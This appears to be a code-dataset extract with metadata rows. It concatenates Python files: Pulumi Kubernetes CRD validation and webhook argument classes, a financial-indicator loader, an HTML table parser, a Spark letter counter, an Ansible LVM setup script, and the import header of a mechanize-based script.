:param pulumi.Input[str] rule: Rule represents the expression which will be evaluated by CEL. ref: https://github.com/google/cel-spec The Rule is scoped to the location of the x-kubernetes-validations extension in the schema. The `self` variable in the CEL expression is bound to the scoped value. Example: - Rule scoped to the root of a resource with a status subresource: {"rule": "self.status.actual <= self.spec.maxDesired"}
If the Rule is scoped to an object with properties, the accessible properties of the object are field selectable via `self.field` and field presence can be checked via `has(self.field)`. Null valued fields are treated as absent fields in CEL expressions. If the Rule is scoped to an object with additionalProperties (i.e. a map) the value of the map are accessible via `self[mapKey]`, map containment can be checked via `mapKey in self` and all entries of the map are accessible via CEL macros and functions such as `self.all(...)`. If the Rule is scoped to an array, the elements of the array are accessible via `self[i]` and also by macros and functions. If the Rule is scoped to a scalar, `self` is bound to the scalar value. Examples: - Rule scoped to a map of objects: {"rule": "self.components['Widget'].priority < 10"} - Rule scoped to a list of integers: {"rule": "self.values.all(value, value >= 0 && value < 100)"} - Rule scoped to a string value: {"rule": "self.startsWith('kube')"}
The `apiVersion`, `kind`, `metadata.name` and `metadata.generateName` are always accessible from the root of the object and from any x-kubernetes-embedded-resource annotated objects. No other metadata properties are accessible.
Unknown data preserved in custom resources via x-kubernetes-preserve-unknown-fields is not accessible in CEL expressions. This includes: - Unknown field values that are preserved by object schemas with x-kubernetes-preserve-unknown-fields. - Object properties where the property schema is of an "unknown type". An "unknown type" is recursively defined as:
- A schema with no type and x-kubernetes-preserve-unknown-fields set to true
- An array where the items schema is of an "unknown type"
- An object where the additionalProperties schema is of an "unknown type"
Only property names of the form `[a-zA-Z_.-/][a-zA-Z0-9_.-/]*` are accessible. Accessible property names are escaped according to the following rules when accessed in the expression: - '__' escapes to '__underscores__' - '.' escapes to '__dot__' - '-' escapes to '__dash__' - '/' escapes to '__slash__' - Property names that exactly match a CEL RESERVED keyword escape to '__{keyword}__'. The keywords are:
"true", "false", "null", "in", "as", "break", "const", "continue", "else", "for", "function", "if",
"import", "let", "loop", "package", "namespace", "return".
Examples:
- Rule accessing a property named "namespace": {"rule": "self.__namespace__ > 0"}
- Rule accessing a property named "x-prop": {"rule": "self.x__dash__prop > 0"}
- Rule accessing a property named "redact__d": {"rule": "self.redact__underscores__d > 0"}
Equality on arrays with x-kubernetes-list-type of 'set' or 'map' ignores element order, i.e. [1, 2] == [2, 1]. Concatenation on arrays with x-kubernetes-list-type use the semantics of the list type:
- 'set': `X + Y` performs a union where the array positions of all elements in `X` are preserved and
non-intersecting elements in `Y` are appended, retaining their partial order.
- 'map': `X + Y` performs a merge where the array positions of all keys in `X` are preserved but the values
are overwritten by values in `Y` when the key sets of `X` and `Y` intersect. Elements in `Y` with
non-intersecting keys are appended, retaining their partial order.
:param pulumi.Input[str] field_path: fieldPath represents the field path returned when the validation fails. It must be a relative JSON path (i.e. with array notation) scoped to the location of this x-kubernetes-validations extension in the schema and refer to an existing field. e.g. when validation checks if a specific attribute `foo` under a map `testMap`, the fieldPath could be set to `.testMap.foo` If the validation checks two lists must have unique attributes, the fieldPath could be set to either of the list: e.g. `.testList` It does not support list numeric index. It supports child operation to refer to an existing field currently. Refer to [JSONPath support in Kubernetes](https://kubernetes.io/docs/reference/kubectl/jsonpath/) for more info. Numeric index of array is not supported. For field name which contains special characters, use `['specialName']` to refer the field name. e.g. for attribute `foo.34$` appears in a list `testList`, the fieldPath could be set to `.testList['foo.34$']`
:param pulumi.Input[str] message: Message represents the message displayed when validation fails. The message is required if the Rule contains line breaks. The message must not contain line breaks. If unset, the message is "failed rule: {Rule}". e.g. "must be a URL with the host matching spec.host"
:param pulumi.Input[str] message_expression: MessageExpression declares a CEL expression that evaluates to the validation failure message that is returned when this rule fails. Since messageExpression is used as a failure message, it must evaluate to a string. If both message and messageExpression are present on a rule, then messageExpression will be used if validation fails. If messageExpression results in a runtime error, the runtime error is logged, and the validation failure message is produced as if the messageExpression field were unset. If messageExpression evaluates to an empty string, a string with only spaces, or a string that contains line breaks, then the validation failure message will also be produced as if the messageExpression field were unset, and the fact that messageExpression produced an empty string/string with only spaces/string with line breaks will be logged. messageExpression has access to all the same variables as the rule; the only difference is the return type. Example: "x must be less than max ("+string(self.max)+")"
:param pulumi.Input[str] reason: reason provides a machine-readable validation failure reason that is returned to the caller when a request fails this validation rule. The HTTP status code returned to the caller will match the reason of the reason of the first failed validation rule. The currently supported reasons are: "FieldValueInvalid", "FieldValueForbidden", "FieldValueRequired", "FieldValueDuplicate". If not set, default to use "FieldValueInvalid". All future added reasons must be accepted by clients when reading this value and unknown reasons should be treated as FieldValueInvalid.
"""
pulumi.set(__self__, "rule", rule)
if field_path is not None:
pulumi.set(__self__, "field_path", field_path)
if message is not None:
pulumi.set(__self__, "message", message)
if message_expression is not None:
pulumi.set(__self__, "message_expression", message_expression)
if reason is not None:
pulumi.set(__self__, "reason", reason)
@property
@pulumi.getter
def rule(self) -> pulumi.Input[str]:
"""
Rule represents the expression which will be evaluated by CEL. ref: https://github.com/google/cel-spec The Rule is scoped to the location of the x-kubernetes-validations extension in the schema. The `self` variable in the CEL expression is bound to the scoped value. Example: - Rule scoped to the root of a resource with a status subresource: {"rule": "self.status.actual <= self.spec.maxDesired"}
If the Rule is scoped to an object with properties, the accessible properties of the object are field selectable via `self.field` and field presence can be checked via `has(self.field)`. Null valued fields are treated as absent fields in CEL expressions. If the Rule is scoped to an object with additionalProperties (i.e. a map) the value of the map are accessible via `self[mapKey]`, map containment can be checked via `mapKey in self` and all entries of the map are accessible via CEL macros and functions such as `self.all(...)`. If the Rule is scoped to an array, the elements of the array are accessible via `self[i]` and also by macros and functions. If the Rule is scoped to a scalar, `self` is bound to the scalar value. Examples: - Rule scoped to a map of objects: {"rule": "self.components['Widget'].priority < 10"} - Rule scoped to a list of integers: {"rule": "self.values.all(value, value >= 0 && value < 100)"} - Rule scoped to a string value: {"rule": "self.startsWith('kube')"}
The `apiVersion`, `kind`, `metadata.name` and `metadata.generateName` are always accessible from the root of the object and from any x-kubernetes-embedded-resource annotated objects. No other metadata properties are accessible.
Unknown data preserved in custom resources via x-kubernetes-preserve-unknown-fields is not accessible in CEL expressions. This includes: - Unknown field values that are preserved by object schemas with x-kubernetes-preserve-unknown-fields. - Object properties where the property schema is of an "unknown type". An "unknown type" is recursively defined as:
- A schema with no type and x-kubernetes-preserve-unknown-fields set to true
- An array where the items schema is of an "unknown type"
- An object where the additionalProperties schema is of an "unknown type"
Only property names of the form `[a-zA-Z_.-/][a-zA-Z0-9_.-/]*` are accessible. Accessible property names are escaped according to the following rules when accessed in the expression: - '__' escapes to '__underscores__' - '.' escapes to '__dot__' - '-' escapes to '__dash__' - '/' escapes to '__slash__' - Property names that exactly match a CEL RESERVED keyword escape to '__{keyword}__'. The keywords are:
"true", "false", "null", "in", "as", "break", "const", "continue", "else", "for", "function", "if",
"import", "let", "loop", "package", "namespace", "return".
Examples:
- Rule accessing a property named "namespace": {"rule": "self.__namespace__ > 0"}
- Rule accessing a property named "x-prop": {"rule": "self.x__dash__prop > 0"}
- Rule accessing a property named "redact__d": {"rule": "self.redact__underscores__d > 0"}
Equality on arrays with x-kubernetes-list-type of 'set' or 'map' ignores element order, i.e. [1, 2] == [2, 1]. Concatenation on arrays with x-kubernetes-list-type use the semantics of the list type:
- 'set': `X + Y` performs a union where the array positions of all elements in `X` are preserved and
non-intersecting elements in `Y` are appended, retaining their partial order.
- 'map': `X + Y` performs a merge where the array positions of all keys in `X` are preserved but the values
are overwritten by values in `Y` when the key sets of `X` and `Y` intersect. Elements in `Y` with
non-intersecting keys are appended, retaining their partial order.
"""
return pulumi.get(self, "rule")
@rule.setter
def rule(self, value: pulumi.Input[str]):
pulumi.set(self, "rule", value)
@property
@pulumi.getter(name="fieldPath")
def field_path(self) -> Optional[pulumi.Input[str]]:
"""
fieldPath represents the field path returned when the validation fails. It must be a relative JSON path (i.e. with array notation) scoped to the location of this x-kubernetes-validations extension in the schema and refer to an existing field. e.g. when validation checks if a specific attribute `foo` under a map `testMap`, the fieldPath could be set to `.testMap.foo` If the validation checks two lists must have unique attributes, the fieldPath could be set to either of the list: e.g. `.testList` It does not support list numeric index. It supports child operation to refer to an existing field currently. Refer to [JSONPath support in Kubernetes](https://kubernetes.io/docs/reference/kubectl/jsonpath/) for more info. Numeric index of array is not supported. For field name which contains special characters, use `['specialName']` to refer the field name. e.g. for attribute `foo.34$` appears in a list `testList`, the fieldPath could be set to `.testList['foo.34$']`
"""
return pulumi.get(self, "field_path")
@field_path.setter
def field_path(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "field_path", value)
@property
@pulumi.getter
def message(self) -> Optional[pulumi.Input[str]]:
"""
Message represents the message displayed when validation fails. The message is required if the Rule contains line breaks. The message must not contain line breaks. If unset, the message is "failed rule: {Rule}". e.g. "must be a URL with the host matching spec.host"
"""
return pulumi.get(self, "message")
@message.setter
def message(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "message", value)
@property
@pulumi.getter(name="messageExpression")
def message_expression(self) -> Optional[pulumi.Input[str]]:
"""
MessageExpression declares a CEL expression that evaluates to the validation failure message that is returned when this rule fails. Since messageExpression is used as a failure message, it must evaluate to a string. If both message and messageExpression are present on a rule, then messageExpression will be used if validation fails. If messageExpression results in a runtime error, the runtime error is logged, and the validation failure message is produced as if the messageExpression field were unset. If messageExpression evaluates to an empty string, a string with only spaces, or a string that contains line breaks, then the validation failure message will also be produced as if the messageExpression field were unset, and the fact that messageExpression produced an empty string/string with only spaces/string with line breaks will be logged. messageExpression has access to all the same variables as the rule; the only difference is the return type. Example: "x must be less than max ("+string(self.max)+")"
"""
return pulumi.get(self, "message_expression")
@message_expression.setter
def message_expression(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "message_expression", value)
@property
@pulumi.getter
def reason(self) -> Optional[pulumi.Input[str]]:
"""
reason provides a machine-readable validation failure reason that is returned to the caller when a request fails this validation rule. The HTTP status code returned to the caller will match the reason of the reason of the first failed validation rule. The currently supported reasons are: "FieldValueInvalid", "FieldValueForbidden", "FieldValueRequired", "FieldValueDuplicate". If not set, default to use "FieldValueInvalid". All future added reasons must be accepted by clients when reading this value and unknown reasons should be treated as FieldValueInvalid.
"""
return pulumi.get(self, "reason")
@reason.setter
def reason(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "reason", value)
@pulumi.input_type
class WebhookClientConfigPatchArgs:
    def __init__(__self__, *,
                 ca_bundle: Optional[pulumi.Input[str]] = None,
                 service: Optional[pulumi.Input['ServiceReferencePatchArgs']] = None,
                 url: Optional[pulumi.Input[str]] = None):
        """
        WebhookClientConfig contains the information to make a TLS connection with the webhook.

        :param ca_bundle: PEM-encoded CA bundle used to validate the webhook's
            server certificate; system trust roots are used when unset.
        :param service: reference to the in-cluster service backing this
            webhook. Exactly one of `service` or `url` must be specified.
        :param url: webhook location in standard URL form
            (`scheme://host:port/path`). Scheme must be https; userinfo,
            fragments and query parameters are not allowed. Exactly one of
            `url` or `service` must be specified.
        """
        # Only forward the arguments the caller actually supplied.
        for key, value in (("ca_bundle", ca_bundle),
                           ("service", service),
                           ("url", url)):
            if value is not None:
                pulumi.set(__self__, key, value)

    @property
    @pulumi.getter(name="caBundle")
    def ca_bundle(self) -> Optional[pulumi.Input[str]]:
        """PEM-encoded CA bundle used to validate the webhook's server
        certificate; system trust roots are used when unset."""
        return pulumi.get(self, "ca_bundle")

    @ca_bundle.setter
    def ca_bundle(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "ca_bundle", value)

    @property
    @pulumi.getter
    def service(self) -> Optional[pulumi.Input['ServiceReferencePatchArgs']]:
        """Reference to the in-cluster service backing this webhook; either
        `service` or `url` must be specified."""
        return pulumi.get(self, "service")

    @service.setter
    def service(self, value: Optional[pulumi.Input['ServiceReferencePatchArgs']]):
        pulumi.set(self, "service", value)

    @property
    @pulumi.getter
    def url(self) -> Optional[pulumi.Input[str]]:
        """Webhook location in standard URL form (`scheme://host:port/path`).
        Must be https; userinfo ("user:password@"), fragments ("#...") and
        query parameters ("?...") are not allowed. Prefer `service` for
        in-cluster webhooks; `localhost`/`127.0.0.1` hosts are non-portable.
        """
        return pulumi.get(self, "url")

    @url.setter
    def url(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "url", value)
@pulumi.input_type
class WebhookClientConfigArgs:
    def __init__(__self__, *,
                 ca_bundle: Optional[pulumi.Input[str]] = None,
                 service: Optional[pulumi.Input['ServiceReferenceArgs']] = None,
                 url: Optional[pulumi.Input[str]] = None):
        """
        WebhookClientConfig contains the information to make a TLS connection with the webhook.

        :param ca_bundle: PEM-encoded CA bundle used to validate the webhook's
            server certificate; system trust roots are used when unset.
        :param service: reference to the in-cluster service backing this
            webhook. Exactly one of `service` or `url` must be specified.
        :param url: webhook location in standard URL form
            (`scheme://host:port/path`). Scheme must be https; userinfo,
            fragments and query parameters are not allowed. Exactly one of
            `url` or `service` must be specified.
        """
        # Only forward the arguments the caller actually supplied.
        for key, value in (("ca_bundle", ca_bundle),
                           ("service", service),
                           ("url", url)):
            if value is not None:
                pulumi.set(__self__, key, value)

    @property
    @pulumi.getter(name="caBundle")
    def ca_bundle(self) -> Optional[pulumi.Input[str]]:
        """PEM-encoded CA bundle used to validate the webhook's server
        certificate; system trust roots are used when unset."""
        return pulumi.get(self, "ca_bundle")

    @ca_bundle.setter
    def ca_bundle(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "ca_bundle", value)

    @property
    @pulumi.getter
    def service(self) -> Optional[pulumi.Input['ServiceReferenceArgs']]:
        """Reference to the in-cluster service backing this webhook; either
        `service` or `url` must be specified."""
        return pulumi.get(self, "service")

    @service.setter
    def service(self, value: Optional[pulumi.Input['ServiceReferenceArgs']]):
        pulumi.set(self, "service", value)

    @property
    @pulumi.getter
    def url(self) -> Optional[pulumi.Input[str]]:
        """Webhook location in standard URL form (`scheme://host:port/path`).
        Must be https; userinfo ("user:password@"), fragments ("#...") and
        query parameters ("?...") are not allowed. Prefer `service` for
        in-cluster webhooks; `localhost`/`127.0.0.1` hosts are non-portable.
        """
        return pulumi.get(self, "url")

    @url.setter
    def url(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "url", value)
@pulumi.input_type
class WebhookConversionPatchArgs:
    def __init__(__self__, *,
                 client_config: Optional[pulumi.Input['WebhookClientConfigPatchArgs']] = None,
                 conversion_review_versions: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
        """
        WebhookConversion describes how to call a conversion webhook.

        :param client_config: instructions for how to call the webhook when
            the conversion strategy is `Webhook`.
        :param conversion_review_versions: ordered list of preferred
            `ConversionReview` versions the webhook expects; the API server
            uses the first version it supports, and conversion fails if none
            of the listed versions are supported.
        """
        # Only forward the arguments the caller actually supplied.
        if client_config is not None:
            pulumi.set(__self__, "client_config", client_config)
        if conversion_review_versions is not None:
            pulumi.set(__self__, "conversion_review_versions", conversion_review_versions)

    @property
    @pulumi.getter(name="clientConfig")
    def client_config(self) -> Optional[pulumi.Input['WebhookClientConfigPatchArgs']]:
        """Instructions for how to call the webhook when strategy is `Webhook`."""
        return pulumi.get(self, "client_config")

    @client_config.setter
    def client_config(self, value: Optional[pulumi.Input['WebhookClientConfigPatchArgs']]):
        pulumi.set(self, "client_config", value)

    @property
    @pulumi.getter(name="conversionReviewVersions")
    def conversion_review_versions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """Ordered list of preferred `ConversionReview` versions; the API
        server uses the first one it supports."""
        return pulumi.get(self, "conversion_review_versions")

    @conversion_review_versions.setter
    def conversion_review_versions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "conversion_review_versions", value)
@pulumi.input_type
class WebhookConversionArgs:
    def __init__(__self__, *,
                 conversion_review_versions: pulumi.Input[Sequence[pulumi.Input[str]]],
                 client_config: Optional[pulumi.Input['WebhookClientConfigArgs']] = None):
        """
        WebhookConversion describes how to call a conversion webhook.

        :param conversion_review_versions: ordered list of preferred
            `ConversionReview` versions the webhook expects; the API server
            uses the first version it supports, and conversion fails if none
            of the listed versions are supported. Required.
        :param client_config: instructions for how to call the webhook when
            the conversion strategy is `Webhook`.
        """
        # conversion_review_versions is mandatory; client_config is optional.
        pulumi.set(__self__, "conversion_review_versions", conversion_review_versions)
        if client_config is not None:
            pulumi.set(__self__, "client_config", client_config)

    @property
    @pulumi.getter(name="conversionReviewVersions")
    def conversion_review_versions(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
        """Ordered list of preferred `ConversionReview` versions; the API
        server uses the first one it supports."""
        return pulumi.get(self, "conversion_review_versions")

    @conversion_review_versions.setter
    def conversion_review_versions(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
        pulumi.set(self, "conversion_review_versions", value)

    @property
    @pulumi.getter(name="clientConfig")
    def client_config(self) -> Optional[pulumi.Input['WebhookClientConfigArgs']]:
        """Instructions for how to call the webhook when strategy is `Webhook`."""
        return pulumi.get(self, "client_config")

    @client_config.setter
    def client_config(self, value: Optional[pulumi.Input['WebhookClientConfigArgs']]):
        pulumi.set(self, "client_config", value)
| [
"noreply@github.com"
] | pulumi.noreply@github.com |
bd7e3b4fa866d69b1e9ca2c7cf23196b84b9bccc | 6d90aa11885178e064b88363c5b6a988c50fa4ad | /aquitania/indicator/management/indicator_loader.py | c26e86546d6551e1eba5f8064c824f52856d5881 | [
"MIT"
] | permissive | retorno/aquitania | 2532c2591edae4ccf2286c771fcff011b5c5eef2 | cd64cf00827b692621893c0e00c508cd5e7ef55b | refs/heads/master | 2020-03-17T08:19:27.734553 | 2018-05-11T00:25:05 | 2018-05-11T00:25:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,844 | py | ########################################################################################################################
# |||||||||||||||||||||||||||||||||||||||||||||||||| AQUITANIA ||||||||||||||||||||||||||||||||||||||||||||||||||||||| #
# |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||| #
# |||| To be a thinker means to go by the factual evidence of a case, not by the judgment of others |||||||||||||||||| #
# |||| As there is no group stomach to digest collectively, there is no group mind to think collectively. |||||||||||| #
# |||| Each man must accept responsibility for his own life, each must be sovereign by his own judgment. ||||||||||||| #
# |||| If a man believes a claim to be true, then he must hold to this belief even though society opposes him. ||||||| #
# |||| Not only know what you want, but be willing to break all established conventions to accomplish it. |||||||||||| #
# |||| The merit of a design is the only credential that you require. |||||||||||||||||||||||||||||||||||||||||||||||| #
# |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||| #
########################################################################################################################
"""
.. moduleauthor:: H Roark
"""
import numpy as np
import pandas as pd
from aquitania.indicator.management.indicator_data import *
import copy
class IndicatorLoader:
    """
    An IndicatorLoader object holds all indicators for a specific Financial Security
    """
    def __init__(self, indicator_list, finsec, timestamp, broker_instance):
        """
        Initializes IndicatorLoader for specific currency and timestamp.
        :param indicator_list: Indicators to be evaluated
        :param finsec: Financial Security that will be evaluated
        :param timestamp: Timestamp of the IndicatorLoader
        :param broker_instance: broker handle forwarded to IndicatorDataManager on save
        """
        # Initialize variables
        self._indicator_list = indicator_list
        self._currency = finsec
        self._timestamp = timestamp
        self._broker_instance = broker_instance
        # Parallel per-candle accumulators: one datetime and one completeness
        # flag appended per candle fed (see store_candle); cleared by generate_df.
        self._datetimes = []
        self._last_candle_dt = None
        self._candle_complete = []
    def feed(self, candle):
        """
        Feeds open candle into open indicators and fillna() to closed indicators.
        :param candle: Input Candle
        """
        # Store Routine
        self.store_candle(candle)
        # Feeds Candle to all indicators
        for indicator in self._indicator_list:
            # Routine for open indicator and closed indicators when candle is complete
            if indicator.is_open or candle.complete:
                indicator.feed(candle)
            else:
                # Fillna closed indicators: keep output length in sync with the
                # candle index even when the indicator is not updated.
                indicator.fillna()
    def fillna(self, candle):
        """
        Saves indicators in case it is a not relevant candle.
        :param candle: Last Candle evaluated
        """
        # Store Candle Routine
        self.store_candle(candle)
        # FillNA method: every indicator pads its output for this candle.
        for indicator in self._indicator_list:
            indicator.fillna()
    def store_candle(self, candle):
        """
        Store Candle routine
        :param candle: Candle to be stored
        """
        self._datetimes.append(candle.datetime)
        self._candle_complete.append(candle.complete)
        # copy so later mutation of the candle's datetime cannot alias this field
        self._last_candle_dt = copy.copy(candle.datetime)
    def save_output(self):
        """
        Combines the output of all the indicators in a single pandas DataFrame.
        """
        # Initializes IndicatorDataManager
        odm = IndicatorDataManager(self._currency, self._broker_instance)
        df = self.generate_df()
        odm.save_output(df, self._timestamp)
    def generate_df(self):
        """Concatenate every indicator's output_list into one DataFrame.

        Side effects: clears each indicator's output_list and resets the
        per-candle accumulators. Returns None when no indicator produced
        any columns.
        """
        # Initialize Variables
        df = None
        # Get candles index
        index = self._datetimes
        # Gets output from indicators
        for indicator in self._indicator_list:
            # Go to next element if columns are empty
            if not indicator.columns:
                indicator.output_list = []
                continue
            temp_df = pd.DataFrame(indicator.output_list, columns=indicator.columns)
            if df is None:
                df = temp_df
            else:
                df = pd.concat([df, temp_df], axis=1)
            # Clears list from memory
            indicator.output_list = []
        if df is None:
            # No columns at all: still reset state so the next cycle starts clean.
            self._datetimes = []
            self._candle_complete = []
            return df
        # Column name suffix comes from ref.ts_to_letter — presumably a
        # timestamp-to-letter mapping defined in indicator_data; verify there.
        df['complete_{}'.format(ref.ts_to_letter[self._timestamp])] = np.array([self._candle_complete]).T
        df.index = index
        self._datetimes = []
        self._candle_complete = []
        # Returns values
        return df
| [
"hroark.aquitania@gmail.com"
] | hroark.aquitania@gmail.com |
8a5cbbbeac6f891fa3dd895c6197b30790a72054 | d7d26c42cd541417edcd7b1992027286ecef7f04 | /lib/base/webscraper/class_htmlparser.py | 72a005b1e355998005611f8d790a5ebcc019c4c5 | [] | no_license | plutoese/pluto_archive | bfba8df48ee5639a2666b33432004519b93ecbf7 | e6ea64aaf867fd0433714293eb65a18a28d3136d | refs/heads/master | 2021-10-22T14:46:20.540770 | 2019-03-11T12:31:08 | 2019-03-11T12:31:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,188 | py | # coding=UTF-8
# --------------------------------------------------------------
# class_htmlparser文件
# @class: HtmlParser类
# @introduction: HtmlParser类用来解析html对象
# @dependency: bs4及re包
# @author: plutoese
# @date: 2016.06.24
# --------------------------------------------------------------
from bs4 import BeautifulSoup
import re
class HtmlParser:
    """Parse an HTML document, or wrap an already-built BeautifulSoup tree.

    :param html_content: raw HTML string, or a ``BeautifulSoup`` object
        to use directly.
    """
    def __init__(self, html_content=None):
        # A pre-parsed soup is adopted as-is; raw markup is parsed with lxml.
        if isinstance(html_content, BeautifulSoup):
            self.bs_obj = html_content
        else:
            self.html_content = html_content
            self.bs_obj = BeautifulSoup(self.html_content, "lxml")

    def table(self, css=None):
        """Return a table's rows as lists of whitespace-stripped cell texts.

        :param css: CSS selector locating the table element; when None an
            empty list is returned.
        :return: list of rows, each a list of cell strings.
        """
        rows = []
        if css is None:
            return rows
        for row in self.bs_obj.select(css + ' > tr'):
            rows.append([re.sub('\s+', '', cell.text) for cell in row.select('td')])
        return rows


if __name__ == '__main__':
    pass
| [
"glen.zhang7@gmail.com"
] | glen.zhang7@gmail.com |
41208d7b3f5a3dceb3e7edf90ba118ac4beffc7a | 45a08d6dd0e7ef32aaebc52740c9ecdec3755e19 | /lab1/A0186040M/lettercount.py | 7ab959220829c28c0ed5615a3d2c9ca8d0d47262 | [] | no_license | liping97412/CS5344 | c81c5f758efa4bb55a39bcb2cbfe954d2d3e8a7d | cfe1c620d97f6e8988944c7eaca9063cef3f5bb2 | refs/heads/master | 2020-09-11T11:25:57.183537 | 2019-11-16T04:48:26 | 2019-11-16T04:48:26 | 222,048,520 | 0 | 0 | null | 2019-11-16T04:49:04 | 2019-11-16T04:46:49 | Python | UTF-8 | Python | false | false | 518 | py | import re
import sys
from pyspark import SparkConf, SparkContext
conf = SparkConf()
sc = SparkContext(conf=conf)
lines = sc.textFile(sys.argv[1])
#split the input file to words with space
words1 = lines.flatMap(lambda l: re.split(" ",l))
#filter the words that have length
words = words1.filter(lambda w: len(w)>0)
#map to the first letter
pairs = words.map(lambda w : (w[0], 1))
#reduce - add up together
result = pairs.reduceByKey(lambda x, y : x + y)
#save the result
result.saveAsTextFile(sys.argv[2])
sc.stop()
| [
"liping.li@u.nus.edu"
] | liping.li@u.nus.edu |
dd7f17b4d5045f1b3430ce33e7bd8589e7e8e82a | 9a846850c38338c3d8200131e734d158acb3bdc8 | /weixin/urls.py | c83c951bb5f1e4d14222955585b351931b0a9812 | [] | no_license | smartpigling/wxsite | 8849ea61ffc40cc1ae64b81abd9098102f516588 | 443b99b6945df8d37fa991e3eb67c9e0710062b6 | refs/heads/master | 2021-07-10T10:16:07.717158 | 2016-10-08T10:45:04 | 2016-10-08T10:45:04 | 42,555,152 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 352 | py | # -*-coding:utf-8 -*-
"""
Created on 2015-09-10
@author: 汤晓川
"""
from django.conf.urls import patterns,url
from .views import Weixin, UserLocationFetching
urlpatterns = patterns('',
url(r'^location/fetch/$', UserLocationFetching.as_view(), name='weixin_fetch_user_location'),
url(r'^(\w+)/$', Weixin.as_view(), name='weixin_entry'),
)
| [
"173387911@qq.com"
] | 173387911@qq.com |
26270c4f53318a3a0e7c8c6c693c57e11c804cc0 | fc8f9724643ab70f96debd4bf5438ea0489d3015 | /playbooks/pvsetup.py | 1618e0d64285601dd61b7bedbfb1785ceb9a8b17 | [] | no_license | ashmitha7/Gluster-Volumes-Ansible | 8f1284fa964d39517709c731059e9957cf56524b | 058a04813a06e0cd911d474daf8fd1452ba5edc9 | refs/heads/master | 2020-12-07T15:35:49.696340 | 2017-08-30T06:15:12 | 2017-08-30T06:15:12 | 95,549,091 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,666 | py | import os
import json
from ast import literal_eval
from tempfile import NamedTemporaryFile
import argparse
from ansible.playbook import Playbook
from ansible.module_utils.basic import *
import jinja2
import yaml
# Command-line interface. NOTE: argparse returns all of these values as
# strings (no type= given), so --size and --number_of_disks must be
# converted to int before any arithmetic.
parser = argparse.ArgumentParser()
parser.add_argument("--type", '-t',
                    required=True,
                    help="disk type is required",
                    choices=["JBOD", "RAID6", "RAID10"])
parser.add_argument("--pvlocation", '-p')
parser.add_argument("--size", '-s')
parser.add_argument("--number_of_disks", '-n')
class PhysicalVolCreate(object):
    """Computes the data-alignment value for an LVM physical volume."""

    def __init__(self):
        pass

    def data_align(self, type, number_of_disks=None, size=None):
        """Return the data alignment for the given disk layout.

        :param type: one of "JBOD", "RAID6", "RAID10".
        :param number_of_disks: total disks in the RAID set (ignored for
            JBOD). Accepts ints or numeric strings — main() passes the raw
            argparse values, which are strings.
        :param size: RAID stripe-unit size (ignored for JBOD); ints or
            numeric strings.
        :return: the alignment value, or the string "Not valid" for an
            unknown type (kept for backward compatibility).
        """
        if type == 'JBOD':
            # Fixed alignment for plain disks; no geometry needed.
            return 256
        # Bug fix: argparse delivers strings, and the original code did
        # string arithmetic (TypeError). Coerce before computing.
        if number_of_disks is not None:
            number_of_disks = int(number_of_disks)
        if size is not None:
            size = int(size)
        if type == 'RAID6':
            # Data disks = total minus the two parity disks.
            return (number_of_disks - 2) * size
        elif type == 'RAID10':
            # Mirrored pairs: half the disks carry data. Floor division
            # preserves the original Python 2 integer-division behaviour.
            return (number_of_disks // 2) * size
        return "Not valid"
def main():
    """Parse CLI args, compute the alignment, write the Ansible vars file
    and run the playbook."""
    args = parser.parse_args()
    disk_type = args.type  # renamed: 'type' shadows the builtin
    if disk_type == 'JBOD':
        data_align = PhysicalVolCreate().data_align(disk_type)
    else:
        # Bug fix: argparse yields strings; convert before arithmetic in
        # data_align. Will raise if the RAID options were omitted, which is
        # clearer than the original TypeError on string arithmetic.
        number_of_disks = int(args.number_of_disks)
        size = int(args.size)
        data_align = PhysicalVolCreate().data_align(disk_type, number_of_disks, size)
    playbook_vars = {
        "pvlocation": args.pvlocation,
        "dalign": data_align
    }
    # Persist the computed vars where the 'pv' role expects them.
    with open('./roles/pv/vars/main.yml', 'w+') as varfile:
        yaml.dump(playbook_vars, varfile, default_flow_style=False)
    # Fixed command string, no user input interpolated into the shell.
    os.system("ansible-playbook -i host.ini " + ' playbooks/play.yml')


if __name__ == '__main__':
    main()
| [
"asambast@dhcp35-211.lab.eng.blr.redhat.com"
] | asambast@dhcp35-211.lab.eng.blr.redhat.com |
73d5020359e306ad4a4a7832385941b010cfc7fb | cc959c8ba773c5a47c039f761ce77319df41ced3 | /ikeh2x.py | a91f8e268e230b4ace6a47faa4d6078bc5c5b8fc | [] | no_license | dikaxyz/yametekudasai | 517801c3d7ebae8dc69dfff87d0e2df29ac319f7 | c7e0907d1456a7ab932f58ef6520793ce4bec317 | refs/heads/main | 2023-01-23T21:21:48.833190 | 2020-12-04T12:49:41 | 2020-12-04T12:49:41 | 318,515,021 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 33,377 | py | #!/usr/bin/python2
# coding=utf-8
#Import module
import os,sys,time,datetime,random,hashlib,re,threading,json,getpass,urllib,cookielib
from multiprocessing.pool import ThreadPool
from datetime import datetime
try:
import mechanize
except ImportError:
os.system("pip2 install mechanize")
try:
import bs4
except ImportError:
os.system("pip2 install bs4")
try:
import requests
except ImportError:
os.system("pip2 install requests")
os.system("python2 DILZ-R.py")
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
